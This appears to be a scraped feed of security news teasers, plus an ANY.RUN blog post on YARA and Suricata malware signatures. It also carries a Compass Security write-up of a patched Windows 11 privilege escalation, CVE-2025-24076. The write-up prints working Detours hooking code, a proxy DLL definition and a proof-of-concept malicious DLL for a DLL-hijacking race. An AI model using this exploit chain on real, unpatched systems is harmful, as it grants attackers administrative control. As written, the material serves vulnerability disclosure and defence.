Blockchain, Quantum, and IoT Firms Unite to Secure Satellite Communications Against Quantum Threats

Partisia, Squareroot8, and NuSpace join forces in a global partnership to advance quantum-safe communications.

The post Blockchain, Quantum, and IoT Firms Unite to Secure Satellite Communications Against Quantum Threats appeared first on SecurityWeek.

SecurityWeek – ​Read More

China Pursuing 3 Alleged US Operatives Over Cyberattacks During Asian Games

China accuses three alleged U.S. NSA operatives of cyberattacks targeting critical infrastructure and the Asian Games in Harbin.

The post China Pursuing 3 Alleged US Operatives Over Cyberattacks During Asian Games appeared first on SecurityWeek.

SecurityWeek – ​Read More

Malware Signatures: How Cybersecurity Teams Use Them to Catch Threats 

Every piece of malware leaves traces behind. Sometimes it’s a string buried deep in the code. Other times it’s a mutex, a registry key, or a network pattern. The key is knowing what to look for. 

That’s exactly what malware signatures are for. They describe these recurring elements, unique strings, behaviors, or structural patterns, that can be used to reliably identify known threats. 

Security teams use these signatures to detect and flag malicious activity; sometimes before the malware even has a chance to do damage. 

In this article, we’ll break down what malware signatures are, the different types you’ll encounter, and how tools like YARA and Suricata help turn small clues into confident decisions. 

What Is a Malware Signature? 

A malware signature is a unique indicator tied to a specific piece of malicious software. It could be a text string, a file hash, a mutex, or even a sequence of behaviors. Security tools use these signatures to recognize and flag known threats, kind of like matching fingerprints at a crime scene. 

The goal is simple: spot malware based on something that consistently shows up across samples from the same family or campaign. Once identified, these signatures become part of detection rules used by antivirus engines, sandboxes, and intrusion detection systems. 

How Are Malware Signatures Created? 

Malware signatures are usually crafted by security researchers and automated detection systems after analyzing how a threat behaves or what it contains. 

When a new malware sample is discovered, analysts break it down, looking at code, memory behavior, registry changes, network traffic, and other markers. If they notice something unique or consistently present across samples, like a specific mutex name, string, or packet structure, that becomes a potential signature. 

Depending on the tool or platform, these signatures might take different forms; 

  • Static signatures are based on strings, byte sequences, or file hashes. 
  • Behavioral signatures are based on what the malware does, like creating certain processes or modifying the registry. 
  • Custom rules, like YARA or Suricata, allow analysts to define more complex patterns based on real-world observations. 

Main Types of Malware Signatures 

Not all malware looks or behaves the same, and the same goes for how we detect it. Over time, security teams have developed different types of signatures to match different kinds of threats.  

Here are the most common ones: 

Static Signatures 

These are the most traditional and widely used. Static signatures match fixed elements inside a file, like strings, byte sequences, or hashes, without needing to run the malware. 

Key traits: 

  • Match based on file content (strings, hex patterns, hashes) 
  • Fast and efficient for known threats 
  • Can be bypassed through obfuscation or slight code changes 
  • Commonly used in antivirus software  

Heuristic Signatures

Heuristic signatures look beyond exact matches. They evaluate the structure or logic of a file to identify suspicious patterns that may indicate malware, even if the sample is new or modified. 

Key traits: 

  • Detect threats based on suspicious code structures 
  • Useful for catching variants or zero-day malware 
  • May generate false positives if too broad 
  • Often found in email filters, AVs, and static analyzers 

Behavioral Signatures 

Rather than scanning a file, these signatures monitor what it does when executed. If it behaves like malware, e.g., injecting code or modifying the registry, it gets flagged. 

Key traits: 

  • Trigger on real-time actions and behaviors 
  • Great for catching fileless or evasive malware 
  • Requires sandboxing or endpoint monitoring 
  • Common in EDRs, sandboxes, and dynamic analysis tools 


Learn to analyze malware in a sandbox

Learn to analyze cyber threats

See a detailed guide to using ANY.RUN’s Interactive Sandbox for malware and phishing analysis



How Detection Tools Use Signatures: YARA and Suricata 

Once malware signatures are defined, they need to be used effectively, and that’s where tools like YARA and Suricata come in. Each serves a unique purpose: one focuses on files and memory, the other on network traffic. Together, they cover a wide range of threats and detection angles. 

YARA Signatures: Matching Patterns in Files and Processes 

YARA is a rule-based detection tool that helps analysts identify malware by describing textual or binary patterns. It’s especially powerful for hunting threats across memory dumps, unpacked payloads, or large malware datasets. 

YARA helps security teams quickly identify threats by matching known patterns in files, processes, or memory. It automates what would otherwise be a slow, manual process, making detection faster, more accurate, and more scalable. 

Its real strength lies in customization. Teams can write tailored rules to catch specific malware strains or adapt to new threats as they emerge. When combined with ANY.RUN’s interactive sandbox, YARA also reveals how they behave, giving organizations the insight they need to act fast and prevent damage. 

Key benefits of YARA in a security workflow: 

  • Speeds up detection and reduces manual effort 
  • Detects both known and emerging malware families 
  • Cuts down false positives with precise rules 
  • Boosts efficiency across security teams 
  • Helps contain threats early and minimize risk 

Real-World Example: Matching the Mutex Pattern 

YARA rule example pulled from ANY.RUN sandbox analysis 

Let’s look at an example of YARA rule used in ANY.RUN’s sandbox: 

$s6 = “Local\SM0:%d:%d:%hs” wide 

This string is part of a rule designed to detect mutexes created by certain malware families.

To see this signature in action, check out this ANY.RUN analysis session

Checking mutex signature inside ANY.RUN sandbox 

Navigate to the MediaCenter.exe process → More InfoSynchronization tab. 

There, you’ll find the mutex: LocalSM0:5320:168:WilStaging_02 

YARA-based mutex signature detected inside ANY.RUN sandbox

This mutex exactly matches the YARA signature pattern. The use of placeholders like %d and %hs allows the rule to flexibly detect variations of this format across different samples. 

  • %d matches any sequence of digits (0–9) 
  • %hs matches a short string or hexadecimal value, typically 2 bytes 

This is a great example of how YARA rules aren’t just powerful, they’re also adaptable to the real-world quirks of evolving malware behavior. 

Submit suspicious files and URLs to ANY.RUN
for proactive analysis of threats targeting your company 



Sign up with business email


Suricata Signatures: Detecting Malicious Behavior in Network Traffic 

While YARA focuses on identifying malware based on what it is, Suricata helps detect malware based on what it does across the network. It’s an advanced intrusion detection system (IDS) that monitors real-time traffic and flags suspicious behavior using both signature- and anomaly-based techniques. 

ANY.RUN integrates Suricata to enhance threat visibility at the network level, allowing analysts to catch threats as they try to communicate with command-and-control servers, exfiltrate data, or spread laterally. Suricata signatures give security teams immediate context; what’s happening, where, and why it matters. 

Click on the Threats tab inside ANY.RUN sandbox to view all threats detected by Suricata rules   

Key benefits of Suricata in a security workflow: 

  • Detects malicious traffic and C2 communication in real time 
  • Complements file-based detection with network-layer visibility 
  • Helps attribute threats to specific malware families 
  • Speeds up incident response with actionable alerts 
  • Empowers teams with visibility into protocol activity across multiple layers 
Suricata Rule Example from ANY.RUN Sandbox Analysis

In ANY.RUN, Suricata rules are applied automatically during sandbox analysis. Let’s take a look at a real-world detection involving Gh0st Remote Access Trojan (RAT). 

View analysis session with Gh0st RAT 

Suricata rule triggered by Gh0st RAT inside ANY.RUN 

After execution, the sample initiates suspicious encrypted traffic. Suricata instantly detects it and flags the connection as Gh0st RAT activity.

Gh0st RAT detected by Suricata 

How it works: 

  • Suricata inspects packets across protocols (HTTP, TCP, UDP, etc.) 
  • It matches patterns defined in the ET (Emerging Threats) rule sets 
  • Once a match is found, it provides detailed metadata: source/destination IPs, ports, signature ID, and threat name 
Clicking on a threat from the list reveals its details 

By switching to the Suricata rule tab, you’ll be able to inspect it more thoroughly.  

Suricata signature displayed inside the ANY.RUN sandbox 

Making the Most of Malware Signatures in ANY.RUN 

Malware signatures can do a lot on their own but when they’re used in the right environment, they become even more useful. 

Inside ANY.RUN’s sandbox, YARA and Suricata work together to give you the full picture. You can see what a file is doing locally, spot mutexes, registry changes, and other signs of malicious behavior, then switch to the network layer to catch things like encrypted C2 traffic or data exfiltration. Both angles are covered, without having to jump between tools. 

Instead of switching between tools, analysts get everything in one place; interactive, real-time, and backed by constantly updated signature sets. This gives less time digging and more time acting. 

If your goal is to reduce investigation time, improve detection accuracy, and truly understand how malware behaves, ANY.RUN puts those capabilities right at your fingertips. 

About ANY.RUN

ANY.RUN is used by over 500,000 cybersecurity professionals and 15,000+ companies across finance, manufacturing, healthcare, and other industries. Its Interactive Sandbox offers fast threat analysis for Windows, Linux, and Android, aiding malware and phishing investigations. Threat Intelligence Lookup and TI Feeds enhance cyber attack knowledge and detection.

Strengthen your company’s cyber resilience with ANY.RUN →

The post Malware Signatures: How Cybersecurity Teams Use Them to Catch Threats  appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

CISO Conversations: Maarten Van Horenbeeck, SVP & Chief Security officer at Adobe

Van Horenbeeck’s career spans some of the biggest companies in tech: Verizon, Microsoft, Google, Amazon, Zendesk, and now SVP and CSO at Adobe.

The post CISO Conversations: Maarten Van Horenbeeck, SVP & Chief Security officer at Adobe appeared first on SecurityWeek.

SecurityWeek – ​Read More

Hertz Discloses Data Breach Linked to Cleo Hack

Customers of the Hertz, Thrifty, and Dollar brands had their personal information stolen as a result of the Cleo hack last year.

The post Hertz Discloses Data Breach Linked to Cleo Hack appeared first on SecurityWeek.

SecurityWeek – ​Read More

Year in Review: The biggest trends in ransomware

Year in Review: The biggest trends in ransomware

This week, our Year in Review spotlight is on ransomware—where low-profile tactics led to high-impact consequences.

Ransomware operators often prioritized stealth over complexity for initial access. They also focused on slipping past defenses with minimal noise—uninstalling security tools, creating new firewall rules for remote access, and using common, freely available tools.

The ransomware-as-a-service landscape also paints an interesting picture. A new player quickly rose through the ranks, becoming the second most prolific operator by targeting large payouts.

Something that hasn’t really changed over the years is the sectors that ransomware actors target most heavily – favouring industries that typically have lower security budgets, irregular monitoring, but highly sensitive data.

We’ve pulled together the most significant insights in a quick, 2-page PDF:

If you only have 55 seconds? Watch this video:

For the full analysis, download Talos’ 2024 Year in Review.

Cisco Talos Blog – ​Read More

Surfshark is our pick for best value VPN, and you can save up to 87% on plans right now

ZDNET’s pick for best value VPN just got cheaper. Through April 30, you can save and score three months free on Surfshark VPN and antivirus plans.

Latest stories for ZDNET in Security – ​Read More

Cookie pop-ups don’t have to be a fact of life online – how I block them and why

There are legitimate uses for cookies but they have a dark side too.

Latest stories for ZDNET in Security – ​Read More

3 Milliseconds to Admin: Mastering DLL Hijacking and Hooking to Win the Race (CVE-2025-24076 and CVE-2025-24994)

As a pentester you are sometimes thrown into projects where you have no idea where you are going to end up. This project was one of those where you were given a customer laptop and the aim was to “find something interesting”, perhaps a misconfiguration on the customer side. The problem was that the laptop provided was being treated as a thin client, where the laptop is mainly used to access a remote desktop and use the browser with no additional software installed.

When the laptop was handed over, I jokingly said to my manager, “So we are looking for a vulnerability in Windows 11 within a single working day?” As it turned out – we did (but of course it took us a lot longer than we had originally planned).

This blog post discusses CVE-2025-24076, which allows an attacker to gain local system privileges from a low privileged user by leveraging the well-known Dynamic-link library (DLL) hijacking technique. The blog also covers CVE-2025-24994 as a side product.

The vulnerability was reported to Microsoft through their responsible disclosure program and has since been fixed.

Starting Point

As usual, we started of with our regular checks and also ran automated scans such as https://github.com/itm4n/PrivescCheck, which caught our attention:

┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0004 - Privilege Escalation                    ┃
┃ NAME     ┃ COM server image file permissions                ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Check whether the current user has any modification rights  ┃
┃ on a COM server module file. This may not necessarily result┃
┃ in a privilege escalation. Further analysis is required.    ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Status: Vulnerable - Medium
Id : {E9F83CF2-E0C0-4CA7-AF01-E90C70BEF496}
Path : HKLMSOFTWAREClassesCLSID{E9F83CF2-E0C0-4CA7-AF01-E90C70BEF496}
Value : InProcServer32
Data : %PROGRAMDATA%CrossDeviceCrossDevice.Streaming.Source.dll
DataType : FilePath
ModifiablePath : C:ProgramData
IdentityReference : VORDEFINIERTBenutzer
Permissions : WriteAttributes, AddSubdirectory, WriteExtendedAttributes, AddFile

The PrivescCheck finding above means that an unprivileged user could potentially modify a DLL file that might be loaded by a COM server running with elevated privileges. However, they would have to figure out how to trigger the COM server to do this.

We did not find any associated COM object on the machine, but we further investigated why this was created in the first place. As it turns out, Windows 11 ships with the relatively new “Mobile devices” feature through Windows Settings. If you haven’t heard, this feature allows a user to link their mobile phone with their Windows computer to send messages, make phone calls via the computer, and access images. Additionally, it allows users to use their phone’s camera as a webcam. And that’s when we struck gold!

When analyzing the “Mobile devices” functionality we noticed that a user modifiable DLL is loaded first by a regular user compa and then by a high privileged user:

Since a Dynamic Link Library (DLL) allows functionality to be loaded into a running program, modifying this file lets us alter its behavior and instruct it to perform any action we want. Since a normal user can modify the DLL file, and it is then executed by a highly privileged user, we can use this to gain administrative rights on the local machine.

Usually, this is prevented by storing the DLL in a location that a low-privileged user cannot modify or by verifying the DLL’s signature to ensure it hasn’t been altered. The DLL was in a user-modifiable location, however it was signed by Microsoft. Luckily for us, the processes loading the DLL didn’t verify the signature.

CVE-2025-24994 occurs because the user process fails to verify the loaded DLL, potentially enabling a user-to-user attack. However, the more interesting vulnerability, CVE-2025-24076, involves the system process loading the DLL and will be discussed below.

Finding this functionality was the hardest part, as exploiting this type of vulnerability is well-documented. However, we encountered a few hurdles and used some clever tricks to make this attack more reliable.

Timing Is Everything

Our first idea was to simply overwrite the file and replace it with our own program. However, this turned out to be easier said than done. As shown in the screenshot above, we only had a 3-millisecond window to replace the file with our malicious version. (Funnily enough, because my virtual machine (VM) was so slow at times, I was able to do this manually a few times using the trusty shortcut CTRL-C and CTRL-V.)

However, we obviously cannot rely on a slow VM, so we had to come up with a trick to slow down the operation. Luckily, James Forshaw figured out that we can use an Opportunistic Lock (https://github.com/googleprojectzero/symboliclink-testing-tools/tree/main/SetOpLock) on a file to halt the execution of a program. The program can only continue once we remove the lock.

We can now halt the program when the DLL is accessed, but we quickly run into the next problem: overwriting a file while it is open is not allowed.

Intercepting WinAPI with Detours

You may have already experienced this behavior. When you have a Word document (or similar) open and try to overwrite it, you are typically greeted with the following warning:

This is due to a Windows restriction that prevents files from being overwritten when they are already open in another program (note that this behavior depends on the ShareMode of the file handle and may not always apply).

Thus, our timeframe is actually much smaller than the 3 milliseconds, since most of the time the file is blocked from being overwritten. The trick here is to wait until the file is no longer being used by another process. In our proof of concept, we intercepted the Close operation call within the user application CrossDeviceService.exe. Therefore we just wait for our turn until the program is done, and then we overwrite the file.

When looking at our current situation, we can observe the following:

  • ① The file is locked and only allows other programs to read, but not modify or overwrite it.
  • ② The file will eventually be closed.
  • Upon examining the Close ② operation in more detail, we can determine why the file was opened in the first place. Specifically, we see that GetFileVersionInfoExW ③ was called to retrieve information about the file.

The idea now is to intercept the GetFileVersionInfoExW function, wait until the file is closed, and then overwrite it with our malicious version.

Microsoft provides a powerful software library called Detours, which makes it easy to intercept Windows API calls. This is not only useful for debugging Windows applications but also allows us to take advantage of the vulnerability we discovered.

We wrote a small program that intercepts the call and replaces it with our custom functionality.

For those technically interested, you can click here to view the code.
#include <windows.h>
#include "detours/detours.h"

// Tell the compiler to link against the Detours library
#pragma comment(lib, "detours/detours.lib")

__declspec(dllexport) BOOL(WINAPI* OriginalGetFileVersionInfoExW)(DWORD dwFlags, LPCWSTR lpwstrFilename, DWORD dwHandle, DWORD dwLen, LPVOID lpData) = NULL;

BOOL WINAPI DetouredGetFileVersionInfoExW(DWORD dwFlags, LPCWSTR lpwstrFilename, DWORD dwHandle, DWORD dwLen, LPVOID lpData);

// This code gets execuded when GetFileVersionInfoExW is intercepted
BOOL WINAPI DetouredGetFileVersionInfoExW(DWORD dwFlags, LPCWSTR lpwstrFilename, DWORD dwHandle, DWORD dwLen, LPVOID lpData)
{
    BOOL ret;
    LPCWSTR malicious = L"C:\ProgramData\CrossDevice\poc.dll";
    LPCWSTR original = L"C:\ProgramData\CrossDevice\CrossDevice.Streaming.Source.dll";

    // Wait till the program calls GetFileVersionInfoExW only for the specific file name
    if (lstrcmpW(lpwstrFilename, original) == 0)
    {
        // Close the file, to make it writable
        ret = OriginalGetFileVersionInfoExW(dwFlags, lpwstrFilename, dwHandle, dwLen, lpData);
        // Overwrite with malicious dll
        CopyFileExW(malicious, original, NULL, NULL, NULL, 0);
        // Return to normal execution
        return ret;
    }
    else
    {
        return OriginalGetFileVersionInfoExW(dwFlags, lpwstrFilename, dwHandle, dwLen, lpData);
    }
}

// This program is loaded into the user program CrossDeviceService.exe
BOOL WINAPI DllMain(HINSTANCE hinst, DWORD dwReason, LPVOID reserved)
{
    if (DetourIsHelperProcess()) {
        return TRUE;
    }

    // When this file is loaded perform the following
    if (dwReason == DLL_PROCESS_ATTACH) {
        DetourRestoreAfterWith();

        // Get function location of GetFileVersionInfoExW during runtime
        OriginalGetFileVersionInfoExW = ((BOOL (WINAPI *)(DWORD dwFlags, LPCWSTR lpwstrFilename, DWORD dwHandle, DWORD dwLen, LPVOID lpData)) DetourFindFunction("kernelbase.dll", "GetFileVersionInfoExW"));

        // Intercept the original function with our modified funtion
        DetourTransactionBegin();
        DetourAttach(&(PVOID&)OriginalGetFileVersionInfoExW, DetouredGetFileVersionInfoExW);
        DetourTransactionCommit();

    }
    // Undo our changes when this file is unloaded
    else if (dwReason == DLL_PROCESS_DETACH) {
        DetourTransactionBegin();
        DetourUpdateThread(GetCurrentThread());
        DetourDetach(&(PVOID&)OriginalGetFileVersionInfoExW, DetouredGetFileVersionInfoExW);
        DetourTransactionCommit();
    }
    return TRUE;
}

We then load this code into the user process, and when all goes well, we replace the DLL with our malicious one within the small time window. Instead of relying on a race condition that lasts less than 3 milliseconds, we’ve turned the exploit into a reliable one that works every time. No need to pray to the demo gods!

Continuing Normal Operation

We’re not done yet; The programs assume that the relevant functions are implemented when loading the DLL. If we simply replace the DLL with our malicious one that grants administrative permissions, the program will crash because the original DLL functions are no longer present.

Therefore, we need to create a proxy that intercepts the program’s request and forwards it to the original function.

The original DLL exposes the two functions DllCanUnloadNow and DllGetClassObject:

# https://github.com/erocarrera/pefile
$ readpe CrossDevice.Streaming.Source.dll

Exported functions
    Library
        Name:                            CrossDevice.Streaming.Source.dll
        Functions
            Function
                Ordinal:                         1
                Address:                         0x12c0
                Name:                            DllCanUnloadNow
            Function
                Ordinal:                         2
                Address:                         0x13a0
                Name:                            DllGetClassObject

With the following definition file, we can specify that our malicious version exposes the two functions with the same name and internally just pass the function calls on to the original file target_original.

EXPORTS
DllCanUnloadNow=target_original.DllCanUnloadNow @1 DllGetClassObject=target_original.DllGetClassObject @2

We can now compile our malicious DLL that will create a new file directly in the C: directory, using the command gcc -shared -o poc.dll malicious.c malicious.def.

#include <windows.h>
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
	switch (ul_reason_for_call) {
		case DLL_PROCESS_ATTACH:
			system("whoami >> C:\poc_only_admin_can_write_to_c.txt");
	}
	return TRUE;
}

Bringing It All Together

With the above tricks we were able to trigger the vulnerability and gain administrative privileges on a Windows 11 machine:

  1. Trigger the installation of the “Mobile devices” Webcam functionality as a low-privilege user.
  2. Wait until the DLL is closed so we can replace it with our malicious one.
  3. Finally, we can see that the high-privilege system user created our file in the C: location. Only high-privilege users can write to that directory.

Recap and Takeaways

This post explains how we were able to gain local administrative privileges on an up-to-date Windows 11 machine by exploiting a weakness in a functionality within Windows 11.

Fortunately, Microsoft has since fixed this vulnerability, and all you need to do is keep installing those Windows updates.

While keeping your system up to date is crucial, there are additional steps you can take to safeguard your machine. By using an Endpoint Detection and Response (EDR) solution, you can proactively detect unusual behavior and identify irregular activity. Even if a vulnerability hasn’t been patched yet, these tools potentially help you catch threats early and stay one step ahead.

PS: Don’t forget to actually collect relevant information and to act on them if you receive such indicators. We published a blog post in the past to bring your EDR team to the next level, which you can find via the following link: Hitchhiker’s Guide to Managed Security – Compass Security Blog.

Disclosure Timeline

2024-09-20: Discovery
2024-10-07: Initial vendor notification
2024-10-08: Initial vendor response
2025-03-11: Release of fixed version / patch
2025-04-15: Coordinated public disclosure date

Microsoft announcement:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24076
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24994

Compass Security Blog – ​Read More

Meta Resumes E.U. AI Training Using Public User Data After Regulator Approval

Meta has announced that it will begin to train its artificial intelligence (AI) models using public data shared by adults across its platforms in the European Union, nearly a year after it paused its efforts due to data protection concerns from Irish regulators.
“This training will better support millions of people and businesses in Europe, by teaching our generative AI models to better

The Hacker News – ​Read More